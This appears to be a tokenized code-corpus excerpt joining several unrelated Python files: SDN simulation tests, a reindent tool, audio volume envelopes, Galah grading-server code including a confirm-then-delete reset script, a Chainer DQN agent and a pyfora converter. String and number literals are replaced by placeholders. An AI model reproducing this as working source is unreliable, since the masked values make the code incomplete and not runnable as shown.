_currently_blocked <EOL> def fileno ( self ) : <EOL> return self . _io_worker . fileno ( ) <EOL> def close ( self ) : <EOL> self . _io_worker . close ( ) <EOL> @ property <EOL> def closed ( self ) : <EOL> return self . _io_worker . closed <EOL> @ property <EOL> def socket ( self ) : <EOL> return self . _io_worker . socket </s>
<s> import unittest <EOL> import sys <EOL> import os <EOL> import signal <EOL> from sts . control_flow . peeker import * <EOL> from tests . unit . sts . event_dag_test import MockInternalEvent <EOL> from tests . unit . sts . mcs_finder_test import MockInputEvent <EOL> from sts . replay_event import InternalEvent , ConnectToControllers <EOL> from sts . event_dag import EventDag <EOL> from config . experiment_config_lib import ControllerConfig <EOL> from sts . simulation_state import SimulationConfig <EOL> from sts . util . convenience import IPAddressSpace <EOL> import logging <EOL> sys . path . append ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> _running_simulation = None <EOL> def handle_int ( sigspec , frame ) : <EOL> print >> sys . stderr , "<STR_LIT>" % sigspec <EOL> if _running_simulation is not None : <EOL> _running_simulation . current_simulation . clean_up ( ) <EOL> raise RuntimeError ( "<STR_LIT>" % sigspec ) <EOL> signal . signal ( signal . SIGINT , handle_int ) <EOL> signal . signal ( signal . SIGTERM , handle_int ) <EOL> class MockConnectToControllers ( ConnectToControllers ) : <EOL> def __init__ ( self , fingerprint = None , ** kwargs ) : <EOL> super ( MockConnectToControllers , self ) . __init__ ( ** kwargs ) <EOL> self . _fingerprint = fingerprint <EOL> self . prunable = False <EOL> @ property <EOL> def fingerprint ( self ) : <EOL> return self . _fingerprint <EOL> def proceed ( self , simulation ) : <EOL> return True <EOL> class MockSnapshotter ( object ) : <EOL> def snapshot_proceed ( * args ) : <EOL> pass <EOL> class PeekerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . input_trace = [ MockInputEvent ( fingerprint = ( "<STR_LIT:class>" , f ) ) for f in range ( <NUM_LIT:1> , <NUM_LIT:7> ) ] <EOL> self . dag = EventDag ( self . input_trace ) <EOL> self . prefix_peeker = PrefixPeeker ( None ) <EOL> IPAddressSpace . _claimed_addresses . clear ( ) <EOL> ControllerConfig . _controller_labels . clear ( ) <EOL> controller_cfg = ControllerConfig ( start_cmd = "<STR_LIT>" ) <EOL> simulation_cfg = SimulationConfig ( controller_configs = [ controller_cfg ] ) <EOL> self . snapshot_peeker = SnapshotPeeker ( simulation_cfg , <EOL> default_dp_permit = True ) <EOL> self . snapshot_peeker . setup_simulation = lambda : ( None , None ) <EOL> self . snapshot_peeker . snapshot_and_play_forward = lambda * args : ( [ ] , None ) <EOL> self . snapshot_peeker . replay_interval = lambda * args : [ ] <EOL> self . mock_snapshotter = MockSnapshotter ( ) <EOL> def test_basic_noop ( self ) : <EOL> """<STR_LIT>""" <EOL> events = [ MockConnectToControllers ( fingerprint = ( "<STR_LIT:class>" , <NUM_LIT:0> ) ) ] + [ MockInputEvent ( fingerprint = ( "<STR_LIT:class>" , f ) ) for f in range ( <NUM_LIT:1> , <NUM_LIT:7> ) ] <EOL> new_dag = self . prefix_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . events ) <EOL> new_dag = self . snapshot_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . events ) <EOL> def test_basic_no_prune ( self ) : <EOL> inp1 = MockConnectToControllers ( fingerprint = "<STR_LIT:a>" ) <EOL> inp2 = MockInputEvent ( fingerprint = "<STR_LIT:b>" ) <EOL> int1 = MockInternalEvent ( fingerprint = "<STR_LIT:c>" ) <EOL> inp3 = MockInputEvent ( fingerprint = "<STR_LIT:d>" ) <EOL> events = [ inp1 , inp2 , int1 , inp3 ] <EOL> def fake_find_internal_events ( replay_dag , inject_input , wait_time ) : <EOL> if inject_input == inp1 : <EOL> return [ ] <EOL> elif inject_input == inp2 : <EOL> return [ int1 ] <EOL> elif inject_input == inp3 : <EOL> return [ ] <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" % replay_dag . events ) <EOL> self . prefix_peeker . find_internal_events = fake_find_internal_events <EOL> new_dag = self . prefix_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . events ) <EOL> def snapshotter_fake_find_internal_events ( s , c , dag_interval , <EOL> inject_input , wait_time ) : <EOL> return ( fake_find_internal_events ( dag_interval , inject_input , wait_time ) , self . mock_snapshotter ) <EOL> self . snapshot_peeker . find_internal_events = snapshotter_fake_find_internal_events <EOL> new_dag = self . snapshot_peeker . peek ( EventDag ( events ) ) <EOL> self . assertEquals ( events , new_dag . events ) <EOL> def test_basic_prune ( self ) : <EOL> inp2 = MockConnectToControllers ( fingerprint = "<STR_LIT:b>" ) <EOL> int1 = MockInternalEvent ( fingerprint = "<STR_LIT:c>" ) <EOL> inp3 = MockInputEvent ( fingerprint = "<STR_LIT:d>" ) <EOL> int2 = MockInternalEvent ( fingerprint = "<STR_LIT:e>" ) <EOL> sub_events = [ inp2 , int1 , inp3 , int2 ] <EOL> def fake_find_internal_events ( replay_dag , inject_input , wait_time ) : <EOL> if inject_input == inp2 : <EOL> return [ ] <EOL> elif inject_input == inp3 : <EOL> return [ int2 ] <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" % replay_dag . events ) <EOL> self . prefix_peeker . find_internal_events = fake_find_internal_events <EOL> new_dag = self . prefix_peeker . peek ( EventDag ( sub_events ) ) <EOL> self . assertEquals ( [ inp2 , inp3 , int2 ] , new_dag . events ) <EOL> def snapshotter_fake_find_internal_events ( s , c , dag_interval , <EOL> inject_input , wait_time ) : <EOL> return ( fake_find_internal_events ( dag_interval , inject_input , wait_time ) , self . mock_snapshotter ) <EOL> self . snapshot_peeker . find_internal_events = snapshotter_fake_find_internal_events <EOL> new_dag = self . snapshot_peeker . peek ( EventDag ( sub_events ) ) <EOL> self . assertEquals ( [ inp2 , inp3 , int2 ] , new_dag . events ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT:1>" <EOL> import tokenize <EOL> import os , shutil <EOL> import sys <EOL> verbose = <NUM_LIT:0> <EOL> recurse = <NUM_LIT:0> <EOL> dryrun = <NUM_LIT:0> <EOL> makebackup = True <EOL> def usage ( msg = None ) : <EOL> if msg is not None : <EOL> print >> sys . stderr , msg <EOL> print >> sys . stderr , __doc__ <EOL> def errprint ( * args ) : <EOL> sep = "<STR_LIT>" <EOL> for arg in args : <EOL> sys . stderr . write ( sep + str ( arg ) ) <EOL> sep = "<STR_LIT:U+0020>" <EOL> sys . stderr . write ( "<STR_LIT:\n>" ) <EOL> def main ( ) : <EOL> import getopt <EOL> global verbose , recurse , dryrun , makebackup <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . error , msg : <EOL> usage ( msg ) <EOL> return <EOL> for o , a in opts : <EOL> if o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> dryrun += <NUM_LIT:1> <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> recurse += <NUM_LIT:1> <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> makebackup = False <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> verbose += <NUM_LIT:1> <EOL> elif o in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> usage ( ) <EOL> return <EOL> if not args : <EOL> r = Reindenter ( sys . stdin ) <EOL> r . run ( ) <EOL> r . write ( sys . stdout ) <EOL> return <EOL> for arg in args : <EOL> check ( arg ) <EOL> def check ( file ) : <EOL> if os . path . isdir ( file ) and not os . path . islink ( file ) : <EOL> if verbose : <EOL> print "<STR_LIT>" , file <EOL> names = os . listdir ( file ) <EOL> for name in names : <EOL> fullname = os . path . join ( file , name ) <EOL> if ( ( recurse and os . path . isdir ( fullname ) and <EOL> not os . path . islink ( fullname ) and <EOL> not os . path . split ( fullname ) [ <NUM_LIT:1> ] . startswith ( "<STR_LIT:.>" ) ) <EOL> or name . lower ( ) . endswith ( "<STR_LIT>" ) ) : <EOL> check ( fullname ) <EOL> return <EOL> if verbose : <EOL> print "<STR_LIT>" , file , "<STR_LIT>" , <EOL> try : <EOL> f = open ( file ) <EOL> except IOError , msg : <EOL> errprint ( "<STR_LIT>" % ( file , str ( msg ) ) ) <EOL> return <EOL> r = Reindenter ( f ) <EOL> f . close ( ) <EOL> if r . run ( ) : <EOL> if verbose : <EOL> print "<STR_LIT>" <EOL> if dryrun : <EOL> print "<STR_LIT>" <EOL> if not dryrun : <EOL> bak = file + "<STR_LIT>" <EOL> if makebackup : <EOL> shutil . copyfile ( file , bak ) <EOL> if verbose : <EOL> print "<STR_LIT>" , file , "<STR_LIT:to>" , bak <EOL> f = open ( file , "<STR_LIT:w>" ) <EOL> r . write ( f ) <EOL> f . close ( ) <EOL> if verbose : <EOL> print "<STR_LIT>" , file <EOL> return True <EOL> else : <EOL> if verbose : <EOL> print "<STR_LIT>" <EOL> return False <EOL> def _rstrip ( line , JUNK = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> i = len ( line ) <EOL> while i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] in JUNK : <EOL> i -= <NUM_LIT:1> <EOL> return line [ : i ] <EOL> class Reindenter : <EOL> def __init__ ( self , f ) : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> self . level = <NUM_LIT:0> <EOL> self . raw = f . readlines ( ) <EOL> self . lines = [ _rstrip ( line ) . expandtabs ( ) + "<STR_LIT:\n>" <EOL> for line in self . raw ] <EOL> self . lines . insert ( <NUM_LIT:0> , None ) <EOL> self . index = <NUM_LIT:1> <EOL> self . stats = [ ] <EOL> def run ( self ) : <EOL> tokenize . tokenize ( self . getline , self . tokeneater ) <EOL> lines = self . lines <EOL> while lines and lines [ - <NUM_LIT:1> ] == "<STR_LIT:\n>" : <EOL> lines . pop ( ) <EOL> stats = self . stats <EOL> stats . append ( ( len ( lines ) , <NUM_LIT:0> ) ) <EOL> have2want = { } <EOL> after = self . after = [ ] <EOL> i = stats [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> after . extend ( lines [ <NUM_LIT:1> : i ] ) <EOL> for i in range ( len ( stats ) - <NUM_LIT:1> ) : <EOL> thisstmt , thislevel = stats [ i ] <EOL> nextstmt = stats [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> have = getlspace ( lines [ thisstmt ] ) <EOL> want = thislevel * <NUM_LIT:2> <EOL> if want < <NUM_LIT:0> : <EOL> if have : <EOL> want = have2want . get ( have , - <NUM_LIT:1> ) <EOL> if want < <NUM_LIT:0> : <EOL> for j in xrange ( i + <NUM_LIT:1> , len ( stats ) - <NUM_LIT:1> ) : <EOL> jline , jlevel = stats [ j ] <EOL> if jlevel >= <NUM_LIT:0> : <EOL> if have == getlspace ( lines [ jline ] ) : <EOL> want = jlevel * <NUM_LIT:2> <EOL> break <EOL> if want < <NUM_LIT:0> : <EOL> for j in xrange ( i - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> jline , jlevel = stats [ j ] <EOL> if jlevel >= <NUM_LIT:0> : <EOL> want = have + getlspace ( after [ jline - <NUM_LIT:1> ] ) - getlspace ( lines [ jline ] ) <EOL> break <EOL> if want < <NUM_LIT:0> : <EOL> want = have <EOL> else : <EOL> want = <NUM_LIT:0> <EOL> assert want >= <NUM_LIT:0> <EOL> have2want [ have ] = want <EOL> diff = want - have <EOL> if diff == <NUM_LIT:0> or have == <NUM_LIT:0> : <EOL> after . extend ( lines [ thisstmt : nextstmt ] ) <EOL> else : <EOL> for line in lines [ thisstmt : nextstmt ] : <EOL> if diff > <NUM_LIT:0> : <EOL> if line == "<STR_LIT:\n>" : <EOL> after . append ( line ) <EOL> else : <EOL> after . append ( "<STR_LIT:U+0020>" * diff + line ) <EOL> else : <EOL> remove = min ( getlspace ( line ) , - diff ) <EOL> after . append ( line [ remove : ] ) <EOL> return self . raw != self . after <EOL> def write ( self , f ) : <EOL> f . writelines ( self . after ) <EOL> def getline ( self ) : <EOL> if self . index >= len ( self . lines ) : <EOL> line = "<STR_LIT>" <EOL> else : <EOL> line = self . lines [ self . index ] <EOL> self . index += <NUM_LIT:1> <EOL> return line <EOL> def tokeneater ( self , type , token , ( sline , scol ) , end , line , <EOL> INDENT = tokenize . INDENT , <EOL> DEDENT = tokenize . DEDENT , <EOL> NEWLINE = tokenize . NEWLINE , <EOL> COMMENT = tokenize . COMMENT , <EOL> NL = tokenize . NL ) : <EOL> if type == NEWLINE : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> elif type == INDENT : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> self . level += <NUM_LIT:1> <EOL> elif type == DEDENT : <EOL> self . find_stmt = <NUM_LIT:1> <EOL> self . level -= <NUM_LIT:1> <EOL> elif type == COMMENT : <EOL> if self . find_stmt : <EOL> self . stats . append ( ( sline , - <NUM_LIT:1> ) ) <EOL> elif type == NL : <EOL> pass <EOL> elif self . find_stmt : <EOL> self . find_stmt = <NUM_LIT:0> <EOL> if line : <EOL> self . stats . append ( ( sline , self . level ) ) <EOL> def getlspace ( line ) : <EOL> i , n = <NUM_LIT:0> , len ( line ) <EOL> while i < n and line [ i ] == "<STR_LIT:U+0020>" : <EOL> i += <NUM_LIT:1> <EOL> return i <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from collections import namedtuple <EOL> import numpy as np <EOL> class VolumeBreakpoint ( <EOL> namedtuple ( '<STR_LIT>' , [ '<STR_LIT:time>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> def __new__ ( cls , time , volume , fade_type = "<STR_LIT>" ) : <EOL> return super ( VolumeBreakpoint , cls ) . __new__ ( <EOL> cls , time , volume , fade_type ) <EOL> class VolumeBreakpoints ( object ) : <EOL> def __init__ ( self , volume_breakpoints ) : <EOL> self . breakpoints = volume_breakpoints <EOL> def add_breakpoint ( self , bp ) : <EOL> self . breakpoints . append ( bp ) <EOL> def add_breakpoints ( self , bps ) : <EOL> self . breakpoints . extend ( bps ) <EOL> def to_array ( self , samplerate ) : <EOL> sorted_bps = sorted ( self . breakpoints , key = lambda x : x . time ) <EOL> arr = np . ones ( int ( sorted_bps [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] * samplerate ) ) <EOL> for i , bp in enumerate ( sorted_bps [ : - <NUM_LIT:1> ] ) : <EOL> t = int ( bp . time * samplerate ) <EOL> v = bp . volume <EOL> next_t = int ( sorted_bps [ i + <NUM_LIT:1> ] . time * samplerate ) <EOL> next_v = sorted_bps [ i + <NUM_LIT:1> ] . volume <EOL> if bp . fade_type == "<STR_LIT>" and v != next_v : <EOL> if v < next_v : <EOL> arr [ t : next_t ] = np . logspace ( <EOL> <NUM_LIT:8> , <NUM_LIT:1> , num = next_t - t , base = <NUM_LIT> ) * ( next_v - v ) / <NUM_LIT> + v <EOL> else : <EOL> arr [ t : next_t ] = np . logspace ( <EOL> <NUM_LIT:1> , <NUM_LIT:8> , num = next_t - t , base = <NUM_LIT> ) * ( v - next_v ) / <NUM_LIT> + next_v <EOL> else : <EOL> arr [ t : next_t ] = np . linspace ( v , next_v , num = next_t - t ) <EOL> return arr </s>
<s> import deepdish as dd <EOL> import numpy as np <EOL> def compute ( indices , x ) : <EOL> return indices , <NUM_LIT:2> * x <EOL> if dd . parallel . main ( __name__ ) : <EOL> x = np . arange ( <NUM_LIT:100> ) * <NUM_LIT:10> <EOL> index_batches = np . array_split ( np . arange ( len ( x ) ) , <NUM_LIT:10> ) <EOL> args = ( ( indices , x [ indices ] ) for indices in index_batches ) <EOL> y = np . zeros_like ( x ) <EOL> for indices , batch_y in dd . parallel . starmap_unordered ( compute , args ) : <EOL> print ( '<STR_LIT>' , indices ) <EOL> y [ indices ] = batch_y <EOL> print ( y ) </s>
<s> from mongoengine import * <EOL> class Archive ( Document ) : <EOL> requester = StringField ( required = True ) <EOL> file_location = StringField ( ) <EOL> error_string = StringField ( ) <EOL> expires = DateTimeField ( ) <EOL> archive_type = StringField ( choices = [ "<STR_LIT>" , "<STR_LIT>" ] , required = True ) <EOL> meta = { <EOL> "<STR_LIT>" : False <EOL> } </s>
<s> from galah . base . config import load_config <EOL> config = load_config ( "<STR_LIT>" ) <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> import mongoengine <EOL> mongoengine . connect ( config [ "<STR_LIT>" ] ) <EOL> from Queue import Queue <EOL> from collections import namedtuple <EOL> Task = namedtuple ( "<STR_LIT>" , ( "<STR_LIT:name>" , "<STR_LIT:args>" , "<STR_LIT>" ) ) <EOL> task_queue = Queue ( ) <EOL> from tasks import task_list <EOL> import zmq <EOL> context = zmq . Context ( ) <EOL> socket = context . socket ( zmq . REP ) <EOL> socket . bind ( config [ "<STR_LIT>" ] ) <EOL> import sys <EOL> def consumer ( ) : <EOL> from threading import current_thread <EOL> logger = logging . getLogger ( "<STR_LIT>" + current_thread ( ) . name ) <EOL> while True : <EOL> task = task_queue . get ( ) <EOL> try : <EOL> task_list [ task . name ] ( * task . args , ** task . kwargs ) <EOL> except Exception as e : <EOL> if type ( e ) is TypeError and str ( e ) . startswith ( "<STR_LIT>" % task . name ) : <EOL> logger . error ( "<STR_LIT>" , str ( task ) ) <EOL> else : <EOL> logger . warning ( <EOL> "<STR_LIT>" , task . name , <EOL> exc_info = sys . exc_info ( ) <EOL> ) <EOL> def to_task ( request ) : <EOL> is_valid = ( <EOL> type ( request ) is dict and <EOL> all ( k in request . keys ( ) for k in ( "<STR_LIT>" , "<STR_LIT:args>" , "<STR_LIT>" ) ) and <EOL> isinstance ( request [ "<STR_LIT>" ] , basestring ) and <EOL> type ( request [ "<STR_LIT:args>" ] ) is list and <EOL> type ( request [ "<STR_LIT>" ] ) is dict <EOL> ) <EOL> if not is_valid : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> return Task ( <EOL> name = request [ "<STR_LIT>" ] , <EOL> args = request [ "<STR_LIT:args>" ] , <EOL> kwargs = request [ "<STR_LIT>" ] <EOL> ) <EOL> from threading import Thread <EOL> consumer_thread = Thread ( name = "<STR_LIT>" , target = consumer ) <EOL> consumer_thread . daemon = True <EOL> consumer_thread . start ( ) <EOL> def main ( ) : <EOL> while True : <EOL> task = socket . recv_json ( ) <EOL> try : <EOL> task = to_task ( task ) <EOL> except RuntimeError as e : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> socket . send_json ( { <EOL> "<STR_LIT:success>" : False , <EOL> "<STR_LIT>" : str ( e ) <EOL> } ) <EOL> continue <EOL> logger . info ( "<STR_LIT>" , task . name ) <EOL> if task . name not in task_list . keys ( ) : <EOL> logger . error ( "<STR_LIT>" , task . name ) <EOL> socket . send_json ( { <EOL> "<STR_LIT:success>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" % task . name <EOL> } ) <EOL> continue <EOL> task_queue . put ( task ) <EOL> socket . send_json ( { "<STR_LIT:success>" : True } ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> def main ( ) : <EOL> delete_submissions = raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> delete_assignments = delete_submissions and raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> delete_users = delete_assignments and raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> delete_classes = delete_users and raw_input ( <EOL> "<STR_LIT>" ) == "<STR_LIT:yes>" <EOL> import mongoengine <EOL> mongoengine . connect ( "<STR_LIT>" ) <EOL> from galah . base . config import load_config <EOL> config = load_config ( "<STR_LIT>" ) <EOL> if delete_submissions : <EOL> import subprocess <EOL> print "<STR_LIT>" <EOL> subprocess . check_call ( [ "<STR_LIT>" , "<STR_LIT>" , config [ "<STR_LIT>" ] ] ) <EOL> import galah . db . models as models <EOL> print "<STR_LIT>" <EOL> models . Submission . objects ( ) . delete ( ) <EOL> if delete_users : <EOL> print "<STR_LIT>" <EOL> models . User . objects ( account_type__ne = "<STR_LIT>" ) . delete ( ) <EOL> if delete_assignments : <EOL> print "<STR_LIT>" <EOL> models . Assignment . objects ( ) . delete ( ) <EOL> if delete_classes : <EOL> print "<STR_LIT>" <EOL> models . Class . objects ( ) . delete ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import copy <EOL> import numpy as np <EOL> from chainer import cuda , FunctionSet , Variable , optimizers <EOL> import chainer . functions as F <EOL> class QNet : <EOL> gamma = <NUM_LIT> <EOL> initial_exploration = <NUM_LIT:10> ** <NUM_LIT:3> <EOL> replay_size = <NUM_LIT:32> <EOL> target_model_update_freq = <NUM_LIT:10> ** <NUM_LIT:4> <EOL> data_size = <NUM_LIT:10> ** <NUM_LIT:5> <EOL> hist_size = <NUM_LIT:1> <EOL> def __init__ ( self , use_gpu , enable_controller , dim ) : <EOL> self . use_gpu = use_gpu <EOL> self . num_of_actions = len ( enable_controller ) <EOL> self . enable_controller = enable_controller <EOL> self . dim = dim <EOL> print ( "<STR_LIT>" ) <EOL> hidden_dim = <NUM_LIT> <EOL> self . model = FunctionSet ( <EOL> l4 = F . Linear ( self . dim * self . hist_size , hidden_dim , wscale = np . sqrt ( <NUM_LIT:2> ) ) , <EOL> q_value = F . Linear ( hidden_dim , self . num_of_actions , <EOL> initialW = np . zeros ( ( self . num_of_actions , hidden_dim ) , <EOL> dtype = np . float32 ) ) <EOL> ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> self . model . to_gpu ( ) <EOL> self . model_target = copy . deepcopy ( self . model ) <EOL> self . optimizer = optimizers . RMSpropGraves ( lr = <NUM_LIT> , alpha = <NUM_LIT> , momentum = <NUM_LIT> , eps = <NUM_LIT> ) <EOL> self . optimizer . setup ( self . model . collect_parameters ( ) ) <EOL> self . d = [ np . zeros ( ( self . data_size , self . hist_size , self . dim ) , dtype = np . uint8 ) , <EOL> np . zeros ( self . data_size , dtype = np . uint8 ) , <EOL> np . zeros ( ( self . data_size , <NUM_LIT:1> ) , dtype = np . int8 ) , <EOL> np . zeros ( ( self . data_size , self . hist_size , self . dim ) , dtype = np . uint8 ) , <EOL> np . zeros ( ( self . data_size , <NUM_LIT:1> ) , dtype = np . bool ) ] <EOL> def forward ( self , state , action , reward , state_dash , episode_end ) : <EOL> num_of_batch = state . shape [ <NUM_LIT:0> ] <EOL> s = Variable ( state ) <EOL> s_dash = Variable ( state_dash ) <EOL> q = self . q_func ( s ) <EOL> tmp = self . q_func_target ( s_dash ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> tmp = list ( map ( np . max , tmp . data . get ( ) ) ) <EOL> else : <EOL> tmp = list ( map ( np . max , tmp . data ) ) <EOL> max_q_dash = np . asanyarray ( tmp , dtype = np . float32 ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> target = np . asanyarray ( q . data . get ( ) , dtype = np . float32 ) <EOL> else : <EOL> target = np . array ( q . data , dtype = np . float32 ) <EOL> for i in xrange ( num_of_batch ) : <EOL> if not episode_end [ i ] [ <NUM_LIT:0> ] : <EOL> tmp_ = reward [ i ] + self . gamma * max_q_dash [ i ] <EOL> else : <EOL> tmp_ = reward [ i ] <EOL> action_index = self . action_to_index ( action [ i ] ) <EOL> target [ i , action_index ] = tmp_ <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> target = cuda . to_gpu ( target ) <EOL> td = Variable ( target ) - q <EOL> td_tmp = td . data + <NUM_LIT> * ( abs ( td . data ) <= <NUM_LIT:1> ) <EOL> td_clip = td * ( abs ( td . data ) <= <NUM_LIT:1> ) + td / abs ( td_tmp ) * ( abs ( td . data ) > <NUM_LIT:1> ) <EOL> zero_val = np . zeros ( ( self . replay_size , self . num_of_actions ) , dtype = np . float32 ) <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> zero_val = cuda . to_gpu ( zero_val ) <EOL> zero_val = Variable ( zero_val ) <EOL> loss = F . mean_squared_error ( td_clip , zero_val ) <EOL> return loss , q <EOL> def stock_experience ( self , time , <EOL> state , action , reward , state_dash , <EOL> episode_end_flag ) : <EOL> data_index = time % self . data_size <EOL> if episode_end_flag is True : <EOL> self . d [ <NUM_LIT:0> ] [ data_index ] = state <EOL> self . d [ <NUM_LIT:1> ] [ data_index ] = action <EOL> self . d [ <NUM_LIT:2> ] [ data_index ] = reward <EOL> else : <EOL> self . d [ <NUM_LIT:0> ] [ data_index ] = state <EOL> self . d [ <NUM_LIT:1> ] [ data_index ] = action <EOL> self . d [ <NUM_LIT:2> ] [ data_index ] = reward <EOL> self . d [ <NUM_LIT:3> ] [ data_index ] = state_dash <EOL> self . d [ <NUM_LIT:4> ] [ data_index ] = episode_end_flag <EOL> def experience_replay ( self , time ) : <EOL> if self . initial_exploration < time : <EOL> if time < self . data_size : <EOL> replay_index = np . random . randint ( <NUM_LIT:0> , time , ( self . replay_size , <NUM_LIT:1> ) ) <EOL> else : <EOL> replay_index = np . random . randint ( <NUM_LIT:0> , self . data_size , ( self . replay_size , <NUM_LIT:1> ) ) <EOL> s_replay = np . ndarray ( shape = ( self . replay_size , self . hist_size , self . dim ) , dtype = np . float32 ) <EOL> a_replay = np . ndarray ( shape = ( self . replay_size , <NUM_LIT:1> ) , dtype = np . uint8 ) <EOL> r_replay = np . ndarray ( shape = ( self . replay_size , <NUM_LIT:1> ) , dtype = np . float32 ) <EOL> s_dash_replay = np . ndarray ( shape = ( self . replay_size , self . hist_size , self . dim ) , dtype = np . float32 ) <EOL> episode_end_replay = np . ndarray ( shape = ( self . replay_size , <NUM_LIT:1> ) , dtype = np . bool ) <EOL> for i in xrange ( self . replay_size ) : <EOL> s_replay [ i ] = np . asarray ( self . d [ <NUM_LIT:0> ] [ replay_index [ i ] ] , dtype = np . float32 ) <EOL> a_replay [ i ] = self . d [ <NUM_LIT:1> ] [ replay_index [ i ] ] <EOL> r_replay [ i ] = self . d [ <NUM_LIT:2> ] [ replay_index [ i ] ] <EOL> s_dash_replay [ i ] = np . array ( self . d [ <NUM_LIT:3> ] [ replay_index [ i ] ] , dtype = np . float32 ) <EOL> episode_end_replay [ i ] = self . d [ <NUM_LIT:4> ] [ replay_index [ i ] ] <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> s_replay = cuda . to_gpu ( s_replay ) <EOL> s_dash_replay = cuda . to_gpu ( s_dash_replay ) <EOL> self . optimizer . zero_grads ( ) <EOL> loss , _ = self . forward ( s_replay , a_replay , r_replay , s_dash_replay , episode_end_replay ) <EOL> loss . backward ( ) <EOL> self . optimizer . update ( ) <EOL> def q_func ( self , state ) : <EOL> h4 = F . relu ( self . model . l4 ( state ) ) <EOL> q = self . model . q_value ( h4 / <NUM_LIT> ) <EOL> return q <EOL> def q_func_target ( self , state ) : <EOL> h4 = F . relu ( self . model_target . l4 ( state / <NUM_LIT> ) ) <EOL> q = self . model_target . q_value ( h4 ) <EOL> return q <EOL> def e_greedy ( self , state , epsilon ) : <EOL> s = Variable ( state ) <EOL> q = self . q_func ( s ) <EOL> q = q . data <EOL> if np . random . rand ( ) < epsilon : <EOL> index_action = np . random . randint ( <NUM_LIT:0> , self . num_of_actions ) <EOL> print ( "<STR_LIT>" ) , <EOL> else : <EOL> if self . use_gpu >= <NUM_LIT:0> : <EOL> index_action = np . argmax ( q . get ( ) ) <EOL> else : <EOL> index_action = np . argmax ( q ) <EOL> print ( "<STR_LIT>" ) , <EOL> return self . index_to_action ( index_action ) , q <EOL> def target_model_update ( self ) : <EOL> self . model_target = copy . deepcopy ( self . model ) <EOL> def index_to_action ( self , index_of_action ) : <EOL> return self . enable_controller [ index_of_action ] <EOL> def action_to_index ( self , action ) : <EOL> return self . enable_controller . index ( action ) </s>
<s> import logging <EOL> import pyfora . Exceptions as Exceptions <EOL> import pyfora . TypeDescription as TypeDescription <EOL> class ObjectConverter ( object ) : <EOL> def __init__ ( self , webObjectFactory , purePythonMDSAsJson ) : <EOL> self . webObjectFactory = webObjectFactory <EOL> self . remoteConverter = webObjectFactory . PyforaObjectConverter ( ) <EOL> def onSuccess ( x ) : <EOL> pass <EOL> def onFailure ( x ) : <EOL> logging . error ( "<STR_LIT>" , x ) <EOL> self . remoteConverter . initialize ( { '<STR_LIT>' : purePythonMDSAsJson } , { '<STR_LIT>' : onSuccess , '<STR_LIT>' : onFailure } ) <EOL> def convert ( self , objectId , objectRegistry , callback ) : <EOL> dependencyGraph = objectRegistry . computeDependencyGraph ( objectId ) <EOL> objectIdToObjectDefinition = { <EOL> objId : TypeDescription . serialize ( objectRegistry . getDefinition ( objId ) ) <EOL> for objId in dependencyGraph . iterkeys ( ) <EOL> } <EOL> def onSuccess ( message ) : <EOL> if '<STR_LIT>' not in message : <EOL> callback ( objectId ) <EOL> else : <EOL> callback ( Exceptions . PythonToForaConversionError ( str ( message [ '<STR_LIT:message>' ] ) , message [ '<STR_LIT>' ] ) ) <EOL> self . remoteConverter . convert ( <EOL> { <EOL> '<STR_LIT>' : objectId , <EOL> '<STR_LIT>' : objectIdToObjectDefinition <EOL> } , <EOL> { <EOL> '<STR_LIT>' : onSuccess , <EOL> '<STR_LIT>' : lambda err : callback ( Exceptions . PythonToForaConversionError ( err ) ) <EOL> } ) </s>
